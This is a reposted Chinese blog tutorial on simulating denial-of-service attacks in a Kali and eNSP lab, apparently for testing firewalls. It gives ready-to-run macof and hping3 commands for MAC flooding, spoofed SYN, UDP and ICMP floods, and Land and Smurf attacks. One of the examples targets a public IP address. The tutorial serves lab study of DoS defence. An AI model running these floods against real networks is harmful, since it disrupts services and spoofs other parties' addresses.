码迷,mamicode.com
首页 > 其他好文 > 详细

用kali和Ensp模拟DOS的实验-可以测试防火墙

时间:2020-08-13 11:59:03      阅读:67      评论:0      收藏:0      [点我收藏+]

标签:目标   mac地址   dos   一个   random   三方   ase   数据包   大小   

常见DoS有Land、死亡之ping、泪滴、Smurf及SYN洪水等,模拟实验可以尝试以下几种。
实验环境:
kali和ensp桥接到物理机的同一张loopback口网卡上,物理机需要添加一张loopback口网卡。
1、macof 交换机mac地址表容量压力测试
可以指定接入环境的网卡和和MAC地址数量,IP和MAC是随机产生的
macof -i eth1 -n 10000
说明:只有一块网卡可以直接macof即可测试
2、hping3 各种flood洪水测试工具
SYN flood
hping3 -q -n -a 10.0.0.1 -S -s 53 --keep -p 22 --flood 192.168.0.1
UDP flood
hping3 -q -n -a 10.0.0.1 --udp -s 53 --keep -p 68 --flood 192.168.0.1
ICMP floodI
hping3 -q -n -a 10.0.0.1 --id 0 --icmp -d 56 --flood 192.168.0.1
random source IP
hping3 -c 10000 -d 5000 -S -w 64 -p 9090 --flood --rand-source 168.63.19.246
Land
hping3 -S -a 192.168.0.1 -p 3389 192.168.0.1
smurf
hping3 -a 192.168.0.1 --icmp 192.168.0.255

-n --numeric 数字化输出,象征性输出主机地址。
-q --quiet 安静模式
-a --spoof 源地址欺骗,伪造源IP
-s --baseport 随机源端口
-p --destport 目的端口
--id hping中的ID值,默认随机
-c --count 发送数据包的数目
-d --data 发送数据包大小,缺省是0
-S --syn set SYN flag
-w --win win的滑动窗口 (default 64)
--keep 保持源端口
--fload 洪水般发送数据包,不显示回复
--rand-source 随机源地址
--icmp icmp模式
--udp udp模式

说明:
land是原地址和目标地址都被设置成某一个服务器地址,这样就会导致服务器向它自己的地址发送SYN-ACK消息,结果这个地址又发回ACK消息并创建一个空连接。
smurf最终是导致该网络的所有主机都对此ICMP应答请求作出答复,导致网络阻塞或第三方崩溃。

参考:http://www.mamicode.com/info-detail-1153430.html
https://www.jianshu.com/p/87fc3f068554
http://www.elecfans.com/baike/wangluo/anfang/20180117617569.html
https://www.bilibili.com/video/BV1iJ411c7Dc/?spm_id_from=333.788.videocard.16

用kali和Ensp模拟DOS的实验-可以测试防火墙

标签:目标   mac地址   dos   一个   random   三方   ase   数据包   大小   

原文地址:https://blog.51cto.com/alibaby/2519301

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!